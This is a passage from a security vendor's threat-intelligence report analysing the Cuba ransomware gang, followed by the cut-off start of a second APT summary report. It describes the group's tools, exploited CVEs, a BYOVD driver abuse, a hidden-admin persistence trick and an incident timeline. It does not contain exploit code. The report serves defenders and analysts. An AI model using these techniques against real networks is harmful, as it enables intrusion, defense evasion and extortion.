\\$recycle.bin\\\n * \\boot\\\n * \\recovery\\\n * \\system volume information\\\n * \\msocache\\\n * \\users\\all users\\\n * \\users\\default user\\\n * \\users\\default\\\n * \\temp\\\n * \\inetcache\\\n * \\google\\\n\nThe ransomware saves time by searching for, and encrypting, Microsoft Office documents, images, archives and others in the %AppData%\\Microsoft\\Windows\\Recent\\ directory, rather than all files on the device. It also terminates all SQL services to encrypt any available databases. It looks for data both locally and inside network shares.\n\n[![List of services that the Cuba ransomware terminates](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png>)\n\nList of services that the Cuba ransomware terminates\n\nBesides encrypting, the group steals sensitive data that it discovers inside the victim's organization. The type of data that the hackers are after depends on the industry that the target company is active in, but in most cases, they exfiltrate the following:\n\n * Financial documents\n * Bank statements\n * Company accounts details\n * Source code, if the company is a software developer\n\n## Arsenal\n\nThe group employs both well-known, "classic" credential access tools, such as mimikatz, and self-written applications. It exploits vulnerabilities in software used by the victim companies: mostly known issues, such as the combination of [ProxyShell](<https://www.computerweekly.com/news/252505767/Half-of-MS-Exchange-servers-at-risk-in-ProxyShell-debacle>) and [ProxyLogon](<https://www.computerweekly.com/news/252497200/Emergency-patch-addresses-MS-Exchange-Server-zero-days>) for attacking Exchange servers, and security holes in the Veeam data backup and recovery service.\n\n[![Malware](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png>)\n\n**Malware**\n\n * Bughatch\n * Burntcigar\n * Cobeacon\n * Hancitor (Chanitor)\n * Termite\n * SystemBC\n * Veeamp\n * Wedgecut\n * RomCOM RAT\n\n[![Tools](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png>)\n\n**Tools**\n\n * Mimikatz\n * PowerShell\n * PsExec\n * Remote Desktop Protocol\n\n[![Vulnerabilities](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png>)\n\n**Vulnerabilities**\n\nProxyShell:\n\n * CVE-2021-31207\n * CVE-2021-34473\n * CVE-2021-34523\n\nProxyLogon:\n\n * CVE-2021-26855\n * CVE-2021-26857\n * CVE-2021-26858\n * CVE-2021-27065\n\nVeeam vulnerabilities:\n\n * [CVE-2022-26501](<https://vulners.com/cve/CVE-2022-26501>)\n * [CVE-2022-26504](<https://vulners.com/cve/CVE-2022-26504>)\n * [CVE-2022-26500](<https://vulners.com/cve/CVE-2022-26500>)\n\n[ZeroLogon](<https://en.wikipedia.org/wiki/Zerologon>):\n\n * CVE-2020-1472\n\n[![Mapping of the attack arsenal to MITRE ATT&CK\u00ae tactics](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09.png>)\n\nMapping of the attack arsenal to MITRE ATT&CK\u00ae tactics\n\n## Profits\n\nThe incoming and outgoing payments in the bitcoin wallets whose identifiers the hackers provide in their ransom notes exceed a total of 3,600 BTC, or more than $103,000,000 converted at the rate of $28,624 for 1 BTC. The gang owns numerous wallets, constantly transferring funds between these, and uses bitcoin mixers: services that send bitcoins through a series of anonymous transactions to make the origin of the funds harder to trace.\n\n[![Part of the transaction tree in the BTC network](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10-1024x517.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10.png>)\n\nPart of the transaction tree in the BTC network\n\n## Investigation of a Cuba-related incident and analysis of the malware\n\n### Host: SRV_STORAGE\n\nOn December 19, we spotted suspicious activity on a customer host, which we will refer to as "SRV_STORAGE" in this report. Telemetry data showed three suspicious new files:\n\n[![Suspicious events in the telemetry data as discovered by the Kaspersky SOC](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11-1024x377.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11.png>)\n\nSuspicious events in the telemetry data as discovered by the Kaspersky SOC\n\nAn analysis of kk65.bat suggested that it served as a stager that initiated all further activity by starting rundll32 and loading the komar65 library into it, which runs the callback function DLLGetClassObjectGuid.\n\n[![Contents of the .bat file that we found](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png>)\n\nContents of the .bat file that we found\n\nLet us take a look inside the suspicious DLL.\n\n#### Bughatch\n\nThe komar65.dll library is also known as "Bughatch", a name it was given in a [report](<https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware>) by Mandiant.\n\nThe first thing that caught our attention was the path to the PDB file. There's a folder named "mosquito" in it, which translates into Russian as "komar". The latter is a part of the DDL name suggesting the gang may include Russian speakers.\n\n[![Path to the komar65.dll PDB file](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13-1024x526.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13.png>)\n\nPath to the komar65.dll PDB file\n\nThe DLL code presents Mozilla/4.0 as the user agent when connecting to the following two addresses:\n\n * com, apparently used for checking external connectivity\n * The gang's command-and-control center. The malware will try calling home if the initial ping goes through.\n\n[![Analysis of komar65.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14-1024x605.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14.png>)\n\nAnalysis of komar65.dll\n\nThis is the kind of activity we observed on the infected host. After Bughatch successfully established a connection with the C2 server, it began collecting data on network resources.\n\n[![Bughatch activity](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15-1024x494.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15.png>)\n\nBughatch activity\n\nLooking into the C2 servers, we found that in addition to Bughatch, these spread modules that extend the malware's functionality. One of those collects information from the infected system and sends it back to the server in the form of an HTTP POST request.\n\n[![Files we found on the Cuba C2 servers](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16-1024x526.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16.jpeg>)\n\nFiles we found on the Cuba C2 servers\n\nOne could think of Bughatch as a backdoor of sorts, deployed inside the process memory and executing a shellcode block within the space it was allocated with the help of Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject), to then connect to the C2 and await further instructions. In particular, the C2 may send a command to download further malware, such as Cobalt Strike Beacon, Metasploit, or further Bughatch modules.\n\n[![Bughatch operating diagram](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17.png>)\n\nBughatch operating diagram\n\n### SRV_Service host\n\n#### Veeamp\n\nAfter some time, we found a malicious process started on a neighboring host; we dubbed this "SRV_Service":\n\n[![Malicious process starting ](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18-1024x260.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18.png>)\n\nMalicious process starting\n\n**Veeamp.exe **is a custom-built data dumper written in C#, which leverages security flaws in the Veeam backup and recovery service to connect to the VeeamBackup SQL database and grab account credentials.\n\n[![Analysis of Veeamp](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19-1024x619.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19.png>)\n\nAnalysis of Veeamp\n\n**Veeamp **exploits the following Veeam vulnerabilities: CVE-2022-26500, CVE-2022-26501, CVE-2022-26504. The first two allow an unauthenticated user to remotely execute arbitrary code, and the third one, lets domain users do the same. After any of the three are exploited, the malware outputs the following in the control panel:\n\n * User name\n * Encrypted password\n * Decrypted password\n * User description in the Credentials table of Veeam: group membership, permissions and so on\n\nThe malware is not exclusive to the Cuba gang. We spotted it also in attacks by other groups, such as Conti and [Yanluowang](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>).\n\nActivity we saw on SRV_Service after Veeamp finished its job was similar to what we had observed on SRV_STORAGE with Bughatch:\n\n[![Bughatch activity on SRV_Service](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20-1024x333.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20.png>)\n\nBughatch activity on SRV_Service\n\nAs was the case with SRV_STORAGE, the malware dropped three files into the temp folder, and then executed these in the same order, connecting to the same addresses.\n\n#### Avast Anti-Rootkit driver\n\nAfter Bughatch successfully established a connection to its C2, we watched as the group used an increasingly popular technique: Bring Your Own Vulnerable Driver (BYOVD).\n\n[![Exploiting a vulnerable driver](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21-1024x424.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21.png>)\n\nExploiting a vulnerable driver\n\nThe malicious actors install the vulnerable driver in the system and subsequently use it to various ends, such as terminating processes or evading defenses through privilege escalation to kernel level.\n\nHackers are drawn to vulnerable drivers because they all run in kernel mode, with a high level of system access. Besides, a legitimate driver with a digital signature will not raise any red flags with security systems, helping the attackers to stay undetected for longer.\n\nDuring the attack, the malware created three files in the temp folder:\n\n * **aswarpot.sys**: a legitimate anti-rootkit driver by Avast that has two vulnerabilities: [CVE-2022-26522](<https://vulners.com/cve/CVE-2022-26522>) and [CVE-2022-26523](<https://vulners.com/cve/CVE-2022-26523>), which allow a user with limited permissions to run code at kernel level.\n * **KK.exe**: malware known as Burntcigar. The file we found was a new variety that used the flawed driver to terminate processes.\n * **av.bat** batch script: a stager that helps the kernel service to run the Avast driver and executes Burntcigar.\n\nAnalysis of the BAT file and telemetry data suggests that av.bat uses the sc.exe utility to create a service named "aswSP_ArPot2", specifying the path to the driver in the \u0421\\windows\\temp\\ directory and the service type as kernel service. The BAT file then starts the service with the help of the same sc.exe utility and runs KK.exe, which connects to the vulnerable driver.\n\n[![Contents of the .bat file that we found](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22-1024x98.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22.png>)\n\nContents of the .bat file that we found\n\n#### Burntcigar\n\nThe first thing we noticed while looking into Burntcigar was the path to the PDB file, which contained a folder curiously named "Musor" (the Russian for "trash"), more indication that the members of the Cuba gang may speak Russian.\n\n[![Path to the KK.exe PDB file](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23-1024x359.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23.png>)\n\nPath to the KK.exe PDB file\n\nWe further discovered that the sample at hand was a new version of Burntcigar, undetectable by security systems at the time of the incident. The hackers had apparently updated the malware, as in the wake of previous attacks, many vendors were able to easily detect the logic run by older versions.\n\nYou may have noticed that in the screenshot of our sample below, all data about processes to be terminated is encrypted, whereas older versions openly displayed the names of all processes that the attackers wanted stopped.\n\n[![Comparison between the old and new version of Burntcigar](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24-1024x779.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24.png>)\n\nComparison between the old and new version of Burntcigar\n\nThe malware searches for process names that suggest a relation to popular AV or EDR products and adds their process IDs to the stack to terminate later.\n\nBurntcigar uses the DeviceIoContol function to access the vulnerable Avast driver, specifying the location of the code that contains the security issue as an execution option. The piece of code contains the ZwTerminateProcess function, which the attackers use for terminating processes.\n\n[![Analysis of Burntcigar](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25-1024x280.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25.png>)\n\nAnalysis of Burntcigar\n\nFortunately, our product's self-defense was able to cope with the malware by blocking all hooks to the driver.\n\nLater, we discovered similar activity exploiting the Avast anti-rootkit driver on the Exchange server and the SRV_STORAGE host. In both cases, the attackers used a BAT file to install the insecure driver and then start Burntcigar.\n\n[![Burntcigar activity on the neighboring hosts](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26-1024x126.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26.png>)\n\nBurntcigar activity on the neighboring hosts\n\n### SRV_MAIL host (Exchange server)\n\nOn December 20, the customer granted our request to add the Exchange server to the scope of monitoring. The host must have been used as an entry point to the customer network, as the server was missing critical updates, and it was susceptible to most of the group's initial access vectors. In particular, SRV_MAIL had the ProxyLogon, ProxyShell and Zerologon vulnerabilities still unremediated. This is why we believe that the attackers penetrated the customer network through the Exchange server.\n\n[![Telemetry data starts coming in](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27-1024x187.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27.png>)\n\nTelemetry data starts coming in\n\nOn SRV_MAIL, the SqlDbAdmin user showed the same kind of activity as that which we had observed on the previous hosts.\n\n[![Malicious activity by SqlDbAdmin](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28-1024x404.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28.png>)\n\nMalicious activity by SqlDbAdmin\n\nWe found that the attackers were using the legitimate gotoassistui.exe tool for transferring malicious files between the infected hosts.\n\nGoToAssist is an RDP support utility often used by technical support teams, but the application is often abused to bypass any security defenses or response teams when moving files between systems.\n\n[![Sending malicious files via gotoassistui.exe](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29-1024x414.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29.png>)\n\nSending malicious files via gotoassistui.exe\n\nWe also found that new Bughatch samples were being executed. These used slightly different file names, callback functions and C2 servers, as our systems were successfully blocking older versions of the malware at that time.\n\n[![Bughatch activity](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30-1024x545.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30.png>)\n\nBughatch activity\n\n#### SqlDbAdmin\n\nWe wondered who that SqlDbAdmin was. The answer came through a suspicious DLL, addp.dll, which we found manually on a compromised host.\n\n[![Suspicious dynamic library](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31-1024x62.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31.png>)\n\nSuspicious dynamic library\n\nWe found that it used the WIN API function NetUserAdd to create the user. The name and password were hard-coded inside the DLL.\n\n[![Analysis of addp.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32-1024x403.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32.png>)\n\nAnalysis of addp.dll\n\nAs we looked further into the library, we found that it used the **RegCreateKey** function to enable RDP sessions for the newly created user by modifying a registry setting. The library then added the user to the Special Account registry tree to hide it from the system login screen, an interesting and fairly unconventional persistence technique. In most cases, bad actors add new users with the help of scripts thatsecurity products rarely miss.\n\n[![Analysis of addp.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33-1024x457.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33.png>)\n\nAnalysis of addp.dll\n\n#### Cobalt Strike\n\nWe found a suspicious DLL, ion.dll, running on the Exchange server as part of the rundll32 process with unusual execution options. At first, we figured that the activity was similar to what we had earlier seen with Bughatch. However, further analysis showed that the library was, in fact, a Cobalt Strike Beacon.\n\n[![Execution of the suspicious ion.dll file](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34-1024x308.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34.png>)\n\nExecution of the suspicious ion.dll file\n\nWhen we were looking at the ion.dll code, what caught our attention was execution settings and a function that uses the Cobalt Strike configuration. The library used the VirtualAlloc function for allocating process memory to execute the Cobalt Strike Beacon payload in, later.\n\n[![Analysis of ion.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png>)\n\nAnalysis of ion.dll\n\nAll configuration data was encrypted, but we did find the function used for decrypting that. To find the Cobalt Strike C2 server, we inspected a rundll32 memory dump with ion.dll loaded into it, running with the same settings it did on the victim host.\n\n[![Memory dump of rundll32](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png>)\n\nMemory dump of rundll32\n\nFinding out the name of the C2 helped us to locate the history of communications with that server within the telemetry data. After the malware connected to the C2, it downloaded two suspicious files into the Windows folder on the infected server and then executed these. Unfortunately, we were not able to obtain the two files for analysis, as the hackers had failed to disable security at the previous step, and the files were wiped off the infected host. We do believe, though, that what we were dealing with was the ransomware itself.\n\n[![Communications with the attackers' C2 server ](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37-1024x471.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37.png>)\n\nCommunications with the attackers' C2 server\n\nThe customer promptly isolated the affected hosts and forwarded the incident to the Kaspersky Incident Response team for further investigation and search for possible artifacts. This was the last we saw of the malicious actor's activity in the customer system. The hosts avoided encryption thanks to the customer following our recommendations and directions, and responding to the incident in time.\n\n## New malware\n\nWe found that VirusTotal contained new samples of the Cuba malware with the same file metadata as the ones in the incident described above. Some of those samples had successfully evaded detection by all cybersecurity vendors. We ran our analysis on each of the samples. As you can see from the screenshot below, these are new versions of Burntcigar using encrypted data for anti-malware evasion. We have made Yara rules that detect these new samples, and we are providing these in the attachment to this article.\n\n[![New malware samples](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38-1024x447.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38.png>)\n\nNew malware samples\n\n## BYOVD (Bring Your Own Vulnerable Driver)\n\nWe will now take a closer look at an attack that uses insecure drivers, which we observed as we investigated the incident and which is currently growing in popularity as various APT and ransomware gangs add it to their arsenals.\n\nBring Your Own Vulnerable Driver (BYOVD) is a type of attack where the bad actor uses legitimate signed drivers that are known to contain a security hole to execute malicious actions inside the system. If successful, the attacker will be able to exploit the vulnerabilities in the driver code to run any malicious actions at kernel level!\n\nUnderstanding why this is one of the most dangerous kinds of attacks takes a quick refresher on what drivers are. A driver is a type of software that acts as an intermediary between the operating system and the device. The driver converts OS instructions into commands that the device can interpret and execute. A further use of drivers is supporting applications or features that the operating system originally lacks. As you can see from the image below, the driver is a layer of sorts between user mode and kernel mode.\n\n[![User mode and kernel mode interaction diagram](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png>)\n\nUser mode and kernel mode interaction diagram. Source: \n<https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode>\n\nApplications running in user mode have fewer privileges to control the system. All they can get access to is a virtualized memory area that is isolated and protected from the rest of the system. The driver runs inside the kernel memory, and it can execute any operations just like the kernel itself. The driver can get access to critical security structures and modify those. Modifications like that make the system liable to attacks that use privilege escalation, disabling of OS security services, and arbitrary reading and writing.\n\nThe [Lazarus](<https://www.bleepingcomputer.com/news/security/lazarus-hackers-abuse-dell-driver-bug-using-new-fudmodule-rootkit/>) gang made use of that technique in 2021 as they gained write access to kernel memory and disabled Windows security features by abusing a Dell driver that contained the [CVE-2021-21551](<https://vulners.com/cve/CVE-2021-21551>) vulnerability.\n\nThere is no sure-fire defense from legitimate drivers, because any driver could prove to have a security flaw. Microsoft has published a list of recommendations to protect against this type of techniques:\n\n * Enable Hypervisor-Protected Code Integrity.\n * Enable Memory Integrity.\n * Enable validation of driver digital signatures.\n * Use the [vulnerable driver blocklist](<https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules>).\n\nHowever, [studies](<https://habr.com/ru/companies/kaspersky/articles/693840/>) suggest that the recommendations are irrelevant even with every Windows protection feature enabled, and attacks like these go through anyway.\n\nTo counter this technique, many security vendors started adding a self-defense module into their products that prevents malware from terminating processes and blocks every attempt at exploiting vulnerable drivers. Our [products](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-select>) have that feature too, and it proved effective during the incident.\n\n## Conclusion\n\nThe Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools, which it keeps up to date, and various techniques and methods including fairly dangerous ones, such as BYOVD. Combating attacks at this level of complexity calls for sophisticated technology capable of detecting advanced threats and protecting security features from being disabled, and a massive, continuously updated threat knowledge base that helps to detect malicious artifacts manually.\n\nThe incident detailed in this article shows that investigation of real-life cyberattacks and incident response, such as Managed Detection and Response (MDR), are sources of the latest information about malicious tactics, techniques and procedures. In particular, during this investigation, we discovered new and previously undetected samples of the Cuba malware, and artifacts suggesting that at least some of the gang members spoke Russian.\n\nThat said, effective investigation and response begin with knowledge of current cyberthreats, which is available from Threat Intelligence services. At Kaspersky, the Threat Intelligence and MDR teams work closely while exchanging data and enhancing their services all the time.\n\n## Appendix\n\nSigma and YARA rules: <https://github.com/BlureL/SigmaYara-Rules> \nIndicators of Compromise: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/14105934/Cuba-ransomware-IoCs-02.pdf>) \nMitre ATT&CK matrices: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/11095522/Cuba-ransomware-TTPs.pdf>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-11T10:00:26", "type": "securelist", "title": "From Caribbean shores to your devices: analyzing Cuba ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-21551", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-26500", "CVE-2022-26501", "CVE-2022-26504", "CVE-2022-26522", "CVE-2022-26523"], "modified": "2023-09-11T10:00:26", "id": "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "href": "https://securelist.com/cuba-ransomware/110533/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n## Targeted attacks\n\n### Putting the 'A' into APT\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nOne thing that sets this campaign apart from others, is the peculiar victim profiling and validation scheme. Out of the 18,000 Orion IT customers affected by the malware, it seems that only a handful were of interest to the attackers. This was a sophisticated attack that employed several methods to try to remain undetected for as long as possible. For example, before making the first internet connection to its C2s, the Sunburst malware lies dormant for up to two weeks, preventing easy detection of this behaviour in sandboxes. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation.\n\nFurther investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png>)\n\nThe shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\n### Lazarus targets the defence industry\n\nWe have observed numerous activities of the Lazarus group over many years, with the threat actor changing targets depending on its objectives. Over the last two years, we have tracked Lazarus's use of ThreatNeedle, an advanced malware cluster of Manuscrypt (aka NukeSped), to target several industries. While investigating [attacks on the defense industry](<https://securelist.com/lazarus-threatneedle/100803/>) in mid-2020, we were able to observe the complete life-cycle of an attack, uncovering more technical details and links to the group's other campaigns.\n\nLazarus made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. Once the victim opens an infected document and agrees to enable macros, the malware is dropped onto the system and proceeds to a multi-stage deployment procedure.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png>)\n\nAfter gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim's environment. They overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the victim's intranet to their remote server.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png>)[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png>)\n\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several other clusters belonging to the Lazarus group.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png>)\n\n### MS Exchange zero-day vulnerabilities exploited in the wild\n\nOn March 2, Microsoft released [out-of-band patches for four zero-day vulnerabilities in Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) that are being actively exploited in the wild (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). The vulnerabilities allow an attacker to gain access to an Exchange server, create a web shell for remote server access and steal data from the victim's network.\n\nMicrosoft attributed the attacks to a threat actor called Hafnium, although other researchers have reported that there are also [other groups exploiting the vulnerabilities to launch 